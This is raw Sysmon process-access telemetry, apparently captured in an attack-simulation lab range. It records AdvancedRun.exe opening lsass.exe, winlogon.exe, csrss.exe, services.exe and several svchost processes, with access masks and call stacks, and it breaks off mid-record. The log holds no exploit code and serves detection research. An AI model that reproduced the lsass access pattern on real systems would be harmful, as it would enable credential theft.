20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004068987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppD